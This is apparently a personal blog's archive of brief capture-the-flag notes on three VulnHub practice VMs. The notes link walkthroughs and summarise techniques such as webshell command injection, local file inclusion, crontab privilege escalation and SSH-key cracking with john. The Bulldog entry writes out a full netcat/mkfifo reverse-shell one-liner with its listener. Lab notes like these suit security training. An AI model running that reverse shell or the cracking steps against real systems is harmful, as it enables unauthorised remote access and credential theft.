Skip to main content

Posts

Showing posts from November, 2018

55 VM Bulldog 1

Walkthru : A. https://medium.com/@krankoPwnz/walkthrough-for-bulldog-on-vulnhub-com-c834573e28fd [passwowd hash in source, webshell with limited command but use || or && to run any command, crontab, python  reverse shell  for priv escalation ] B. https://securitybytes.io/vulnhub-com-bulldog-ctf-solution-b00b4640327a [pwd in binary file extract it using strings file] C. https://hack-ed.net/2017/11/09/bulldog-ctf-walkthrough/ [read files from webshell] D. https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ [upgrade shell] Notes: There was a crontab file that runs daily. I tried to add bash revershell, added user to sudoer file, php reveershe shell but non worked. but I was able to create a file using that crontab which lead me to believe it is possible to perform escalation using it. I used rm cmd to perform revershell reveres shell rm /tmp/f|mkfifo /tmp/f|cat /tmp/f|/bin/sh -i 2>&1|nc 172.16.1.100 1234 >/tmp/f nc -nvlp 1234
Post a Comment
Read more

54 VM W1R3S: 1.0.1

Walkthru A. https://github.com/nbrisset/CTF/tree/master/CTF-VulnLabs/w1r3s [local file inclusion, ftp, Cuppa CMS  vulnerability   , LFI working using CLI but not browser, john,  sudo su for  privilege esclation  ] B. https://blog.barradell-johns.com/index.php/2018/06/25/w1r3s-writeup/ [ I was getting the same response from server for LFI . looks like it needed encoding. " After a bit of research I found I may have better luck with encoded url ( url  encoding ) params, so I utilised cURL" ] Notes:
Post a Comment
Read more

53 VM Basic Pentest 2

Walkthru A. https://resources.infosecinstitute.com/basic-pentesting-2-ctf-walkthrough/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+infosecResources+%28InfoSec+Resources%29 [brute force passphrases for ssh login, convert private key to another format so we can use john to brute force key ] B. http://www.hackingarticles.in/hack-the-basic-pentesting2-vm-ctf-challenge/ [ use  ssh2john  to convert this SSH key into a crackable file for john the ripper. ] C. https://medium.com/@nelsoncoln/basic-pentesting-2-vm-walkthrough-383047900187 [ vim.basic have root permissions, that means that I could probably read the file in kay’s directory, ] Notes; [from walktheu B] python ssh2john key > ssh_login john ssh_login
Post a Comment
Read more